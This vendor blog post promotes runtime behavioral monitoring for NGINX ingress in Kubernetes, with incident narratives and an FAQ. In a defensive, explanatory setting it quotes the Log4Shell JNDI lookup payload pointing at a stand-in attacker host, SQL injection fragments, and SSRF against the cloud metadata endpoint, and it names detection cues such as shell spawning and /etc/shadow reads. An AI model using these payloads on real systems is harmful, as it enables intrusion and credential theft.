Get the latest, first
arrowBlog
What Is the Best Security for NGINX in Kubernetes? (Beyond Configuration)

What Is the Best Security for NGINX in Kubernetes? (Beyond Configuration)

Jan 15, 2026

Jonathan Kaftzan
VP Marketing

Key Insights

What is the best security for NGINX Kubernetes?

The best security combines configuration controls (TLS, headers, network policies, pod security) with runtime behavioral monitoring that detects anomalies your configuration can’t see. Configuration creates the baseline—it defines what should happen. Runtime protection catches what gets through—it shows what is happening. You need both, but most teams only have the first.

Why isn’t WAF protection enough for NGINX security?

WAFs use pattern matching against known attack signatures. Attackers use encoding, obfuscation, and novel techniques that don’t match patterns. Time-based blind injection, SSRF through legitimate-looking requests, deserialization attacks—these bypass WAFs because they don’t look like attacks at the HTTP layer. They exploit application logic, not HTTP patterns.

How does runtime protection catch what configuration misses?

Runtime protection builds behavioral baselines from observed production behavior—which processes should run, which connections should occur, which files should be accessed. When behavior deviates from that baseline, it’s flagged immediately. This catches zero-days and novel attacks that have no signatures because it detects anomalous behavior, not known patterns.

What’s the difference between siloed alerts and attack story correlation?

Siloed tools generate separate alerts—WAF logs, container security events, cloud audit trails—requiring manual correlation across dashboards. Attack story correlation links events across all layers into a single timeline. The difference is 5+ hours of investigation versus 30 minutes. Learn more about attack chain detection here.

How do you prioritize NGINX container vulnerabilities effectively?

Runtime reachability analysis identifies which CVEs affect code paths actually executed in production—not every vulnerability in your base image. Combine this with EPSS scores and KEV catalog data for exploitability context. This typically reduces actionable CVEs by 90%+.

The Kubernetes security industry has spent five years telling you to “shift left.” Scan earlier. Catch vulnerabilities in the pipeline. Harden your NGINX ingress configuration before deployment. The logic seems sound: fix problems before they reach production.

Here’s what the shift-left vendors don’t mention: you can shift left perfectly and still get breached.

We know this because we see the pattern constantly. A platform security lead at a financial services company told us last quarter: “We had every scan you can imagine. SAST, DAST, container scanning, CIS benchmarks. Our NGINX configuration was textbook. Then we got breached through a deserialization vulnerability in a backend service that our scanners rated ‘low severity.’ The attacker was in our cluster for eleven days before we noticed.”

Eleven days. With a fully hardened ingress configuration. With every pipeline scan passing.

This isn’t an anomaly. When we onboard enterprise security teams to runtime monitoring, the first week is usually uncomfortable. They discover lateral movement attempts their WAF never logged. Unusual outbound connections from NGINX pods that looked normal in access logs. Process spawning in containers that passed every scan.

The problem isn’t that shift-left controls don’t work. They do—against the attacks they were designed to stop. But here’s the fundamental gap:

Configuration defines what should happen. Only runtime monitoring shows what is actually happening.

Your TLS settings define how encryption should work. Your WAF rules define what traffic should be blocked. Your network policies define which pods should communicate. Your seccomp profiles define which syscalls should execute.

None of this tells you what is happening. And that gap—between security assumptions and security reality—is where breaches live.

This guide doesn’t just cover NGINX hardening. Every other article does that. We’ll show you:

  • Why the configuration controls you already have (and should keep) aren’t sufficient
  • What runtime behavioral detection actually looks like in practice
  • The visibility gap at the application layer that most security content ignores
  • Real attack scenarios based on patterns we observe—and what the difference looks like between teams with and without runtime visibility

But first: Baseline your current state. Run this:

kubescape scan –include-namespaces ingress-nginx

Kubescape is our open-source scanner. No signup, takes 60 seconds. When we analyze scans across thousands of clusters, most teams find gaps they didn’t know existed—pods running as root, missing network policies, RBAC permissions that accumulated over time. That’s your starting point.

The Baseline You Already Have (And Why It’s Not Enough)

You’ve already done significant work. TLS with modern cipher suites. Security headers configured per CIS benchmarks. Rate limiting on sensitive endpoints. Maybe ModSecurity with the OWASP Core Rule Set. Your cluster architecture follows best practices. Your team passed the last compliance audit.

This is necessary. You should keep doing it. But understand what it protects against: known patterns of attack that announce themselves at the front door.

Here’s what these controls can’t see:

A WAF uses pattern matching. It looks for signatures like ‘ OR 1=1. Attackers know this. They’ve known it for fifteen years. Double-URL encoding, time-based blind injection, polyglot payloads—the techniques to bypass signature matching are well-documented. The NGINX ingress vulnerabilities we’ve tracked over the past two years have exploited annotation parsing, not HTTP patterns.

Network policies define allowed paths. But attacks move through allowed paths. If your NGINX pod can talk to your user-service, and user-service can talk to your database, the policy allows the traffic. It doesn’t know the difference between a legitimate query and an exfiltration.

Pod security standards constrain what containers can do. They don’t detect what containers are doing. A container running as non-root with a read-only filesystem can still execute a memory-resident attack that never touches the filesystem.

A security architect at a healthcare company: “We spent six months hardening our NGINX ingress. CIS benchmarks, WAF rules, the works. Then we deployed runtime monitoring and discovered that one of our NGINX pods had been making outbound DNS queries to a domain registered two weeks before our deployment. Our WAF saw nothing. Our network policies allowed DNS. Our pod security was ‘restricted’ profile. We’d been compromised for months.”

Configuration is static. Attacks are dynamic. If your security strategy ends at configuration, you’ve built a castle with no guards.

What “Runtime” Actually Means (Not Marketing, Mechanics)

When vendors say “runtime security,” they usually mean one of two things: container scanning with runtime context, or actual behavioral monitoring. These are not the same.

Runtime-contextualized scanning means: we scanned your images, we see what’s running, we can tell you which CVEs are in running containers. This is useful. It’s not detection.

Behavioral runtime monitoring means: we observe what processes execute, what network connections occur, what files are accessed, what syscalls happen—at the kernel level using eBPF—and we detect when behavior deviates from established baselines.

ARMO uses the second approach. Here’s what that looks like for your NGINX pods:

We deploy sensors that hook into the Linux kernel via eBPF. No sidecars, no application changes. The sensors observe:

  • Process execution: NGINX worker processes follow predictable patterns. They spawn from the master process. They handle requests. They don’t execute /bin/sh. They don’t run curl. When something outside that pattern happens, we see it.
  • Network connections: Your NGINX pods talk to specific backend services on specific ports. We build a map of normal communication. When a connection occurs outside that map—especially outbound to an IP that’s never been contacted—we flag it.
  • File access: NGINX reads config files. It writes to access logs and error logs. It doesn’t read /etc/shadow. It doesn’t write to /tmp/exploit.sh. Filesystem activity outside normal patterns indicates tampering.
  • System calls: Every operation goes through syscalls. NGINX makes a specific set of them during normal operation. Syscalls associated with exploitation—execve for unexpected binaries, ptrace for debugging injection, socket for unexpected network activity—trigger alerts when they deviate from the baseline.

We call this behavioral fingerprint Application Profile DNA. It’s built from observed production behavior, not from guesses about what a container should do. The profile is specific to your workload, your traffic patterns, your deployment.

When we ask customers what made the difference, the answer is usually the same: “We stopped getting alerts about what might be wrong and started getting alerts about what was wrong.”

The Visibility Gap: Application-Layer Attacks

Most NGINX security content stops at the ingress layer. It covers TLS, headers, rate limiting, WAF—controls that operate on HTTP requests before they reach your application.

But here’s what actually happens in production: the attacks that succeed target your applications, and they happen after traffic passes through NGINX.

Attack Patterns We Actually See

These aren’t theoretical. They’re patterns we observe when customers deploy runtime monitoring for the first time.

Encoded SQL Injection Bypassing WAF:

Your ModSecurity rules look for decoded SQL patterns. An attacker sends a triple-encoded payload. NGINX logs show a 200 response—successful request. Your WAF saw normal traffic. Your backend database saw ‘; DROP TABLE users; — after decoding.

We detect this not by pattern matching (we’d miss the same encoding tricks) but by observing the effect: the application process suddenly makes unusual database queries, or the database container shows unexpected network activity, or file access patterns change.

Server-Side Request Forgery (SSRF):

The request to NGINX is legitimate—it’s hitting a valid endpoint. The exploit happens when your application uses input to construct an internal request. The attacker reaches your cloud metadata endpoint (169.254.169.254), extracts IAM credentials, and escalates from there.

Your WAF sees a normal request. Your network policies allow internal traffic. We detect this because the application container makes a network connection to an IP that’s never in its behavioral baseline—the metadata service it’s never needed to contact before.

Deserialization and Memory Attacks:

Remember Log4Shell (CVE-2021-44228)? The payload ${jndi:ldap://attacker.com/a} didn’t look like an attack. It looked like a log message. The exploit happened when Log4j processed it, triggered an LDAP lookup, and downloaded malicious code.

No WAF signature matches that pattern until after the CVE is published and rules are updated. We detected Log4Shell exploitation in customer environments before they had time to patch—because we saw containers suddenly making outbound LDAP connections they’d never made before.

This is the fundamental advantage of behavioral detection: you don’t need to know the attack signature. You need to know what normal behavior looks like. Everything else is anomalous.

What an Incident Actually Looks Like: Two Realities

We’re going to walk through the same attack scenario twice. Once as it unfolds for a team with traditional siloed tools. Once as it unfolds for a team with runtime detection and attack story correlation.

This is based on a composite of real incidents—details changed for anonymization, but the pattern and timeline are representative.

Reality One: Siloed Tools

Tuesday, 9:47 AM:

Your SOC gets a WAF alert: “Possible SQL injection attempt blocked.” This is the 47th such alert this week. Most are false positives—security scanners, malformed requests, that one vendor integration that sends weird characters. An analyst notes it and continues monitoring. There’s nothing actionable here; the request was blocked.

Tuesday, 10:15 AM:

A container security alert fires: “Unexpected process in namespace ‘payments’.” Different dashboard, different team. The analyst who gets this alert doesn’t know about the WAF alert. They investigate. A process spawned that’s not in the expected list. Could be a cron job someone forgot to document. Could be a developer debugging something. The analyst Slacks the payments team: “Anyone running anything unusual in prod?”

Tuesday, 10:38 AM:

Cloud security alert: “Unusual API call to S3 bucket ‘customer-documents’.” Third dashboard. The analyst pulls CloudTrail logs. An IAM role that normally has read-only access made a ListObjects call on a bucket it’s never touched. The analyst starts building a timeline in a spreadsheet, trying to figure out if this is related to the earlier alerts.

Tuesday, 11:45 AM:

The analyst has correlated timestamps manually. The three events happened within an hour. They escalate to the security lead. A war room forms. Six people are now looking at four different dashboards trying to piece together what happened.

Tuesday, 2:30 PM:

After four hours of investigation, the team confirms: the “blocked” SQL injection request was actually one of many. Most were blocked. One variant got through—an encoding the WAF didn’t recognize. That successful injection extracted credentials from a database. Those credentials were used to authenticate to an internal service. That service had access to S3. Data was exfiltrated.

Attacker dwell time: at least since 9:47 AM when the first alert fired. Probably longer—that was just when they got noisy enough to trigger detection. Investigation time: 5+ hours and counting.

Wednesday:

The CISO asks for a root cause analysis. The team spends another day piecing together how the attack progressed. They still don’t know exactly what data was accessed or how long the attacker was actually present.

Reality Two: Attack Story Correlation

Tuesday, 9:47 AM:

ARMO detects an anomaly in the user-service container: an unusual network connection to an internal IP (the payments database) followed by a data pattern that doesn’t match historical queries. This triggers correlation logic.

Within 30 seconds, the platform links this to:

  • A request pattern at the NGINX ingress layer (high volume of similar requests with variations)
  • The unusual network connection in the user-service container
  • A subsequent authentication event to an internal admin API
  • An S3 API call from an IAM role that never touches that bucket

Tuesday, 9:48 AM:

A single alert fires: “Attack chain detected.” The attack story shows the full timeline with one click:

“At 9:42 AM, a series of encoded SQL injection attempts targeted the /api/users endpoint. At 9:47 AM, one variant bypassed WAF rules and reached the user-service container. The payload extracted credentials from the users table (CVE-2023-XXXXX in [email protected]). At 9:49 AM, these credentials authenticated to the internal-admin-api. At 9:51 AM, the compromised session accessed S3 bucket ‘customer-documents.’ Exfiltration to external IP 203.0.113.42 began at 9:52 AM.

Recommended actions: Quarantine user-service container. Rotate database credentials. Revoke IAM session ‘arn:aws:sts::…:assumed-role/…’. Block egress to 203.0.113.42.”

Tuesday, 10:15 AM:

Container quarantined. Credentials rotated. Egress blocked. Incident contained.

Total dwell time: 33 minutes. Investigation time: 27 minutes. The team isn’t correlating alerts across dashboards—they’re reading a narrative that explains exactly what happened.

The “90%” Claims: What They Actually Mean

You’ll see us say “90% reduction in CVE noise” and “90% reduction in investigation time.” Let’s unpack those.

90% Reduction in Vulnerability Noise

The average container image has 400-600 CVEs. We’ve written extensively about this problem—vulnerability scanners report everything, regardless of whether the vulnerable code path is actually executed.

Runtime reachability analysis changes this. We observe which libraries and functions are actually loaded and executed in production. A CVE in a library that’s bundled but never imported? Not reachable. A CVE that requires a specific configuration your deployment doesn’t use? Not exploitable.

When we onboard customers, we typically see their “actionable CVE” count drop from hundreds to dozens. One platform team told us: “We went from 847 critical/high CVEs to 23 that were actually reachable. My team stopped treating vulnerability management as a checkbox exercise and started actually patching what mattered.”

The 90% figure isn’t marketing—it’s the median reduction we see across deployments. Your mileage depends on how many unused dependencies your images contain (usually: a lot).

90% Reduction in Investigation Time

This comes from attack story correlation. Instead of manually correlating alerts across WAF logs, container security tools, SIEM events, and cloud audit trails, you get a single timeline.

The 5-hour investigation in Reality One isn’t unusual. It’s typical for teams using siloed tools. They’re skilled, they work hard, but they’re spending most of their time on correlation rather than remediation.

The 27-minute investigation in Reality Two is also typical for teams with CADR (Cloud Application Detection and Response). They’re not faster analysts—they have a single source of truth instead of four dashboards.

Smart Remediation: Fixing Without Breaking

Here’s a problem we hear constantly: “We know we should tighten security controls, but we’re terrified of breaking production.”

Network policies are the classic example. The theory is straightforward: default-deny posture, explicit allow rules for known traffic. In practice, teams are afraid to implement this because they don’t know all the traffic patterns. What if they block something legitimate?

Same with seccomp profiles. You want to restrict syscalls, but what if you block one the application actually needs? Production goes down, and suddenly security is the enemy.

This is where runtime observation becomes operational:

  • Network policies: Instead of guessing which connections should be allowed, we observe actual traffic patterns over a baseline period. Then we generate policies based on what we’ve seen. The policy reflects reality, not assumptions. When you apply it, you know it won’t block legitimate traffic—because we’ve already seen that traffic.
  • Seccomp profiles: Instead of copying a generic profile from the internet, we build profiles from the syscalls your NGINX containers actually make. We run in “observe” mode, log every syscall, then generate a profile that allows exactly those syscalls and nothing else. You can apply it with confidence because it’s based on your specific workload.
  • Before/after visibility: You can see what the remediation will change before you apply it. “This network policy will block traffic from namespace X to namespace Y.” If that’s unexpected, investigate first. If it’s expected, apply with confidence.

One platform engineer described it as: “Security changes went from ‘fingers crossed, let’s hope this doesn’t break anything’ to ‘we know exactly what this affects because we can see the traffic.'”

Getting Started

Today (5 minutes):

kubescape scan –include-namespaces ingress-nginx

See your current security posture. Find the misconfigurations you didn’t know existed. Fix the obvious gaps—pods running as root, missing network policies, RBAC permissions that accumulated over time. This is free and requires no signup.

This week:

Review your configuration controls against what Kubescape found. Implement default-deny network policies. Tighten RBAC. Apply pod security standards. Verify your ingress hardening matches NSA/CISA recommendations. These are table stakes.

This month:

Deploy ARMO runtime protection on your NGINX ingress controllers. Build behavioral baselines. Discover the anomalies your configuration-based tools are missing. Start with your most critical ingress—the one routing traffic to payment processing, customer data, or admin interfaces.

Ongoing:

Use runtime-generated policies to harden your deployment without breaking production. Let attack story correlation cut your investigation time. Stop chasing CVEs that don’t matter. Focus on the vulnerabilities attackers can actually exploit.

Next Steps

Baseline your security posture:

kubescape scan –include-namespaces ingress-nginx

60 seconds, free, no signup. See what your NGINX deployment actually looks like from a security perspective.

Add runtime visibility:

Deploy runtime protection on your critical ingress controllers. Most teams discover anomalies they had no visibility into within the first week.

See attack story correlation in action:

Schedule a demo with an environment similar to yours. We’ll show you the difference between correlating alerts across four dashboards and reading a single attack timeline.

Frequently Asked Questions

Why do teams with hardened configurations still get breached?

Because configuration defines what should happen, not what is happening. A perfectly configured WAF still passes attacks it doesn’t recognize. Perfectly configured network policies still allow traffic on permitted paths. Attacks succeed by operating in the gap between your security assumptions and runtime reality. Runtime detection closes that gap.

What’s the difference between CSPM and runtime security?

CSPM (Cloud Security Posture Management) tells you whether your configuration matches security best practices. It answers: “Is this cluster configured correctly?” Runtime security tells you whether your environment behaves as expected. It answers: “Is something wrong happening right now?” You need both. But CSPM without runtime is like having a building inspector without security guards—you know the locks are good, but you don’t know if anyone’s picking them.

How much overhead does eBPF-based monitoring add?

Our sensors typically consume 1-2.5% CPU and 1% memory. eBPF runs in the kernel, not in user space, so the overhead is minimal. No sidecars means no per-pod resource multiplication. In production deployments, teams consistently tell us they don’t notice the overhead.

Can’t we just patch all vulnerabilities instead of using runtime reachability?

You could try. The average container has 604 CVEs. Most enterprises have hundreds or thousands of containers. Patching everything means constant churn, testing overhead, and deployment delays—for vulnerabilities that may not be exploitable in your environment. Runtime reachability tells you which 5-10% of CVEs actually matter. You patch what’s dangerous. Everything else goes into a backlog that doesn’t block deploys.

What does “attack story” actually mean?

Instead of three separate alerts in three tools requiring manual correlation, you get a narrative: “SQL injection bypassed WAF → exploited CVE in mysql2 → extracted credentials → authenticated to internal API → accessed S3 bucket → attempted exfiltration.” One timeline, one explanation, specific remediation steps. We’ve written more about this approach here.

We already use EDR/XDR. Why do we need this?

Traditional EDR was built for endpoints and enterprise workloads—laptops, servers, VMs. It doesn’t understand Kubernetes constructs: namespaces, pods, deployments, service accounts. It doesn’t correlate container events with Kubernetes control plane events with cloud API calls. Cloud-native environments need security tools that understand cloud-native architecture.

Close

Your cloud tools say
you're protected.
Want to check for free?

Save your Spot city
Close

Your Cloud Security Advantage Starts Here

Webinars
Data Sheets
Surveys and more
Group 1410190284
Ben Hirschberg CTO & Co-Founder
Rotem_sec_exp_200
Rotem Refael VP R&D
Group 1410191140
Amit Schendel Security researcher
slack_logos Continue to Slack

Get the information you need directly from our experts!

new-messageContinue as a guest